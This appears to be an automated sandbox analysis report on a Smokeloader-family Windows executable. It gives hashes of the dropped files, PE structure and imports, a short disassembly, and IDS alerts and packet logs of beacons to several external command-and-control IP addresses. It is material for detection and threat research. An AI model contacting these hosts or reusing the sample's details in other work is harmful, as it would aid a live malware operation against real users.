                                                        SHA-512:74C01977EA1687125DC4F1B92FA557359705A8EE6ACFF58F6F021AA7EA03759AD542A57AFF1FC2BF9BF8D9CE65326B32A44013F6A9C3B00936FF760F1F89BC6A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#G..g&tRg&tRg&tRyt.Rs&tRyt.R.&tRyt.RK&tR@..R`&tRg&uR.&tRyt.Rf&tRyt.Rf&tRyt.Rf&tRRichg&tR................PE..L.....Pa.............................Q............@.........................................................................L...P.......h............................................................/..@............................................text...2........................... ..`.data...\x.......B..................@....rsrc...h............B..............@..@.reloc..(............T..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\FD31.exe

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1134592
                                                        Entropy (8bit):7.828823860751131
                                                        Encrypted:false
                                                        SSDEEP:24576:YKAqUNGPdqsbEwe0qATvITiju9AIM2c2m6zc:YBqU4qsbje0qCI+Ck6zc
                                                        MD5:823B2BD8B63CAFBEA781C59993109B99
                                                        SHA1:E385DFCBBD2B24A8B9184493F629F24FE95A4741
                                                        SHA-256:7B23F464DC640B6BA79B4213B2ACE1D96E68F039C21BAB5E1A21E3A4F707DC6D
                                                        SHA-512:B1193F2CE6B964AF886F5F4216696028295EAAC09165E60C09039715D87FE033B4E3BB05CA38E0D02637C5B7588D6618487669BA96B574FB73CFDF8AA3437241
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#G..g&tRg&tRg&tRyt.Rs&tRyt.R.&tRyt.RK&tR@..R`&tRg&uR.&tRyt.Rf&tRyt.Rf&tRyt.Rf&tRRichg&tR................PE..L...Y..a.............................Q............@.......................... ......w<......................................L...P....p..h............................................................/..@............................................text...2........................... ..`.data...<Q..........................@....rsrc...hp...p......................@..@.reloc...!......."..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\FD31.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):770048
                                                        Entropy (8bit):6.839518525412359
                                                        Encrypted:false
                                                        SSDEEP:12288:zfSxtWGq0esNiHPcc92qLSl6Tw3he78O48BG7QvUaDkndA+OmV8YqOgFkVd4FGJC:z6x4ff3Sxg5/R5ou7/P795pJc
                                                        MD5:AD4FE6DD11ECA5F7254E0E00ED47D984
                                                        SHA1:E809DE0322D74DD4642F215F46F22B3A9B7CAA21
                                                        SHA-256:6ECC725EAB418E27D8FA2F1031FCE6BC119D677B8D72E0447050A87489E8E0CA
                                                        SHA-512:D09F4F9A94F34FE1A6F5FE78EC32E91026FE07263183D4D41C4A51CFA7EE5FBC1B38D2EBEDA20A717A2A730AF011D73D113DECB3AE2FE9DB50530C095CF33EA3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Joe Sandbox View:
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Win32.PWSX-gen.15846.15487.exe, Detection: malicious, Browse
                                                        • Filename: tZU0MUwxja.exe, Detection: malicious, Browse
                                                        • Filename: 8uRBOolRiA.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e:..![.@![.@![.@.,.A&[.@.,.A [.@L..A"[.@![.@5[.@.D.@([.@...A [.@...A [.@...A [.@Rich![.@................PE..L...R.xc...........!.....2...................P............................................@..........................Q..@....Q..<...............................`S...P...............................................P..@............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...`1...`...2...:..............@....reloc..`S.......T...l..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\cgjtubb

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):310272
                                                        Entropy (8bit):6.931502130500228
                                                        Encrypted:false
                                                        SSDEEP:3072:SYSXEsZbccjajbfH/ERv9m/Y1ymkYFFdurkrdJVqje7DmZ6K8nkf2x+CqbbSyyr:JSXBFEf/o9rsmzamsMDmshnkf8+CwbG
                                                        MD5:8691765A5EF6354D21BD12C83E9DF20B
                                                        SHA1:47B548237CED425F7F2AC209CCF0914F8980FA70
                                                        SHA-256:C9B23216DC8719C25C60FE8334FA5A5C3B9AD54FCAEDF94DFB18B8E8EC6CDA2B
                                                        SHA-512:D7EB0DADC5F2E856DFDCEA43936BF3355A858880EC9E814C6528DAA82F27E3C377F00AF6968176E064F7C10C9ECD75E6DDEFFFC4F3EA718A5AE0ABF0167AD65E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#G..g&tRg&tRg&tRyt.Rs&tRyt.R.&tRyt.RK&tR@..R`&tRg&uR.&tRyt.Rf&tRyt.Rf&tRyt.Rf&tRRichg&tR................PE..L.....=b.............................Q............@.......................... ......3.......................................L...P.......h............................................................/..@............................................text...2........................... ..`.data...............................@....rsrc...h...........................@..@.reloc..:...........................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\cgjtubb:Zone.Identifier

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.931502130500228
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.55%
                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:file.exe
                                                        File size:310272
                                                        MD5:8691765a5ef6354d21bd12c83e9df20b
                                                        SHA1:47b548237ced425f7f2ac209ccf0914f8980fa70
                                                        SHA256:c9b23216dc8719c25c60fe8334fa5a5c3b9ad54fcaedf94dfb18b8e8ec6cda2b
                                                        SHA512:d7eb0dadc5f2e856dfdcea43936bf3355a858880ec9e814c6528daa82f27e3c377f00af6968176e064f7c10c9ecd75e6ddefffc4f3ea718a5ae0abf0167ad65e
                                                        SSDEEP:3072:SYSXEsZbccjajbfH/ERv9m/Y1ymkYFFdurkrdJVqje7DmZ6K8nkf2x+CqbbSyyr:JSXBFEf/o9rsmzamsMDmshnkf8+CwbG
                                                        TLSH:1664AE0176BCCF62D5DD4D7CCC2EFB94DBB8B85299384557766B3AAE1E30391422220E
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#G..g&tRg&tRg&tRyt.Rs&tRyt.R.&tRyt.RK&tR@..R`&tRg&uR.&tRyt.Rf&tRyt.Rf&tRyt.Rf&tRRichg&tR................PE..L.....=b...........

                                                        File Icon

                                                        Icon Hash:8c9cbcccce8888e5

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4051d8
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x623DBFFC [Fri Mar 25 13:13:32 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:45d8216f77748b6d8826de34ecd9c69e

                                                        Entrypoint Preview

                                                        Instruction
                                                        call 00007FEF88A8627Fh
                                                        jmp 00007FEF88A8266Dh
                                                        push 00000008h
                                                        push 0040FEB8h
                                                        call 00007FEF88A834D3h
                                                        mov ecx, dword ptr [ebp+08h]
                                                        test ecx, ecx
                                                        je 00007FEF88A8281Ch
                                                        cmp dword ptr [ecx], E06D7363h
                                                        jne 00007FEF88A82814h
                                                        mov eax, dword ptr [ecx+1Ch]
                                                        test eax, eax
                                                        je 00007FEF88A8280Dh
                                                        mov eax, dword ptr [eax+04h]
                                                        test eax, eax
                                                        je 00007FEF88A82806h
                                                        and dword ptr [ebp-04h], 00000000h
                                                        push eax
                                                        push dword ptr [ecx+18h]
                                                        call 00007FEF88A863B9h
                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                        call 00007FEF88A834E2h
                                                        ret
                                                        xor eax, eax
                                                        cmp byte ptr [ebp+0Ch], al
                                                        setne al
                                                        ret
                                                        mov esp, dword ptr [ebp-18h]
                                                        call 00007FEF88A8585Ch
                                                        int3
                                                        call 00007FEF88A8302Ah
                                                        xor ecx, ecx
                                                        cmp dword ptr [eax+00000090h], ecx
                                                        setne cl
                                                        mov al, cl
                                                        ret
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        mov eax, dword ptr [ebp+08h]
                                                        mov dword ptr [0042A044h], eax
                                                        pop ebp
                                                        ret
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 00000328h
                                                        mov eax, dword ptr [00411410h]
                                                        xor eax, ebp
                                                        mov dword ptr [ebp-04h], eax
                                                        and dword ptr [ebp-00000328h], 00000000h
                                                        push ebx
                                                        push 0000004Ch
                                                        lea eax, dword ptr [ebp-00000324h]
                                                        push 00000000h
                                                        push eax
                                                        call 00007FEF88A866DFh
                                                        lea eax, dword ptr [ebp-00000328h]
                                                        mov dword ptr [ebp-000002D8h], eax
                                                        lea eax, dword ptr [ebp-000002D0h]
                                                        add esp, 0Ch
                                                        mov dword ptr [ebp+00FFFD2Ch], eax

                                                        Rich Headers

                                                        Programming Language:
                                                        • [ASM] VS2008 build 21022
                                                        • [ C ] VS2008 build 21022
                                                        • [C++] VS2008 build 21022
                                                        • [IMP] VS2005 build 50727
                                                        • [RES] VS2008 build 21022
                                                        • [LNK] VS2008 build 21022

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1024c0x50.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x21068.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x500000xaac.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x11d00x1c.text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f080x40.text
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x180.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000xfb320xfc00False0.5807136656746031data6.722585865916189IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data0x110000x1c6bc0x19000False0.838154296875data7.3097228756772745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x2e0000x210680x21200False0.6358637971698113data6.357000757091439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x500000x193a0x1a00False0.3557692307692308data3.553364651483905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        AFX_DIALOG_LAYOUT0x4d0780xedataSetsuanaSouth Africa
                                                        BANUMAROSAJOYUTE0x4a1000x7d1ASCII text, with very long lines (2001), with no line terminatorsSetsuanaSouth Africa
                                                        PESIVINAFUSAWAVIJEWAZUYIJOVOBOR0x4af080x2107ASCII text, with very long lines (8455), with no line terminatorsSetsuanaSouth Africa
                                                        SIROPIMOTUGAGI0x4a8d80x629ASCII text, with very long lines (1577), with no line terminatorsSetsuanaSouth Africa
                                                        RT_CURSOR0x4d0880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                        RT_CURSOR0x4df300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                        RT_CURSOR0x4e8000x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SetsuanaSouth Africa
                                                        RT_CURSOR0x4e9300xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x2ebd00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x2fa780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x303200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x328c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x339700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x33e280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x344f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x36a980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x36f300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x37dd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x386800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x38be80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x3b1900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x3c2380x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x3cbc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x3d0900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSetsuanaSouth Africa
                                                        RT_ICON0x3df380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSetsuanaSouth Africa
                                                        RT_ICON0x3e7e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSetsuanaSouth Africa
                                                        RT_ICON0x3eea80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSetsuanaSouth Africa
                                                        RT_ICON0x3f4100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SetsuanaSouth Africa
                                                        RT_ICON0x419b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SetsuanaSouth Africa
                                                        RT_ICON0x42a600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SetsuanaSouth Africa
                                                        RT_ICON0x433e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SetsuanaSouth Africa
                                                        RT_ICON0x438c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x447700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x450180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x456e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x45c480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x481f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x492980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa
                                                        RT_ICON0x49c200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                        RT_STRING0x4ebf80x470dataSetsuanaSouth Africa
                                                        RT_ACCELERATOR0x4d0100x28dataSetsuanaSouth Africa
                                                        RT_GROUP_CURSOR0x4e7d80x22dataSetsuanaSouth Africa
                                                        RT_GROUP_CURSOR0x4e9e00x22dataSetsuanaSouth Africa
                                                        RT_GROUP_ICON0x33dd80x4cdataSetsuanaSouth Africa
                                                        RT_GROUP_ICON0x36f000x30dataSetsuanaSouth Africa
                                                        RT_GROUP_ICON0x3d0280x68dataSetsuanaSouth Africa
                                                        RT_GROUP_ICON0x438500x76dataSetsuanaSouth Africa
                                                        RT_GROUP_ICON0x4a0880x76dataSetsuanaSouth Africa
                                                        RT_VERSION0x4ea080x1ecdataSetsuanaSouth Africa
                                                        None0x4d0480xadataSetsuanaSouth Africa
                                                        None0x4d0380xadataSetsuanaSouth Africa
                                                        None0x4d0580xadataSetsuanaSouth Africa
                                                        None0x4d0680xadataSetsuanaSouth Africa

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllCreateMutexW, WriteConsoleOutputCharacterA, OpenJobObjectA, GetCommState, AddConsoleAliasW, GetSystemDefaultLCID, GetFileAttributesExA, GetModuleHandleW, WaitNamedPipeW, LoadLibraryW, CopyFileW, GetFileAttributesW, WriteConsoleW, GetVolumePathNameA, GetConsoleAliasesW, FillConsoleOutputCharacterW, GetComputerNameA, SetLastError, GetProcAddress, VirtualAlloc, RemoveDirectoryA, EnumSystemCodePagesW, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, CreateHardLinkW, GetModuleHandleA, FindNextFileW, GetStringTypeW, SetFileShortNameA, LCMapStringW, GetLastError, GetVolumeNameForVolumeMountPointA, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapSize, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetLocaleInfoA, FlushFileBuffers, GetConsoleOutputCP, CloseHandle, CreateFileA
                                                        GDI32.dllGetCharacterPlacementW
                                                        ole32.dllCoRevokeMallocSpy

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        SetsuanaSouth Africa

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        192.168.2.4222.236.49.12349732802851815 11/20/22-23:29:42.980601TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184973280192.168.2.4222.236.49.123
                                                        192.168.2.4190.140.74.4349706802851815 11/20/22-23:29:11.593775TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970680192.168.2.4190.140.74.43
                                                        192.168.2.4190.147.188.5049729802851815 11/20/22-23:29:38.939202TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972980192.168.2.4190.147.188.50
                                                        192.168.2.4190.140.74.4349712802851815 11/20/22-23:29:17.825718TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184971280192.168.2.4190.140.74.43
                                                        192.168.2.4190.140.74.4349710802851815 11/20/22-23:29:15.417911TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184971080192.168.2.4190.140.74.43
                                                        192.168.2.4175.119.10.23149699802851815 11/20/22-23:28:59.421588TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184969980192.168.2.4175.119.10.231
                                                        192.168.2.4138.36.3.13449715802851815 11/20/22-23:29:20.999357TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184971580192.168.2.4138.36.3.134
                                                        192.168.2.4175.119.10.23149733802851815 11/20/22-23:29:44.502536TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184973380192.168.2.4175.119.10.231
                                                        192.168.2.4222.236.49.12349721802851815 11/20/22-23:29:27.376996TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972180192.168.2.4222.236.49.123
                                                        192.168.2.4175.119.10.23149726802851815 11/20/22-23:29:34.630714TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972680192.168.2.4175.119.10.231
                                                        192.168.2.4210.182.29.7049730802851815 11/20/22-23:29:40.008032TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184973080192.168.2.4210.182.29.70
                                                        192.168.2.4210.182.29.7049727802851815 11/20/22-23:29:36.126865TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972780192.168.2.4210.182.29.70
                                                        192.168.2.4222.236.49.12349714802851815 11/20/22-23:29:19.586363TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184971480192.168.2.4222.236.49.123
                                                        192.168.2.4175.119.10.23149723802851815 11/20/22-23:29:29.402513TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972380192.168.2.4175.119.10.231
                                                        192.168.2.4210.182.29.7049705802851815 11/20/22-23:29:10.022918TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970580192.168.2.4210.182.29.70
                                                        192.168.2.4138.36.3.13449704802851815 11/20/22-23:29:08.366632TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970480192.168.2.4138.36.3.134

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 20, 2022 23:28:58.396303892 CET4969880192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:28:58.482804060 CET804969841.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:28:58.482973099 CET4969880192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:28:58.483763933 CET4969880192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:28:58.483799934 CET4969880192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:28:58.570708036 CET804969841.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:28:58.901444912 CET804969841.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:28:58.901499033 CET804969841.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:28:58.901596069 CET4969880192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:28:58.901676893 CET4969880192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:28:58.990201950 CET804969841.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:28:59.137768984 CET4969980192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:28:59.421356916 CET8049699175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:28:59.421478987 CET4969980192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:28:59.421587944 CET4969980192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:28:59.423085928 CET4969980192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:28:59.707319975 CET8049699175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:00.599958897 CET8049699175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:00.600013018 CET8049699175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:00.600158930 CET4969980192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:00.600218058 CET4969980192.168.2.4175.119.10.231
                                                        Nov 20, 2022 23:29:00.629110098 CET4970080192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:00.883749008 CET8049699175.119.10.231192.168.2.4
                                                        Nov 20, 2022 23:29:00.904581070 CET8049700222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:00.905826092 CET4970080192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:00.905910015 CET4970080192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:00.906945944 CET4970080192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:01.182473898 CET8049700222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:02.113181114 CET8049700222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:02.113208055 CET8049700222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:02.113284111 CET4970080192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:02.113500118 CET4970080192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:02.143007994 CET4970180192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:02.219110012 CET804970141.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:02.219197989 CET4970180192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:02.219367981 CET4970180192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:02.219815969 CET4970180192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:02.296494961 CET804970141.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:02.388700962 CET8049700222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:03.167042017 CET804970141.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:03.167128086 CET4970180192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:03.169171095 CET804970141.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:03.169239044 CET4970180192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:03.169286966 CET4970180192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:03.198738098 CET4970280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:03.245829105 CET804970141.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:03.277803898 CET804970241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:03.277937889 CET4970280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:03.278062105 CET4970280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:03.278083086 CET4970280192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:03.357839108 CET804970241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:03.689342022 CET804970241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:03.689404011 CET804970241.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:03.690092087 CET4970280192.168.2.441.41.255.235
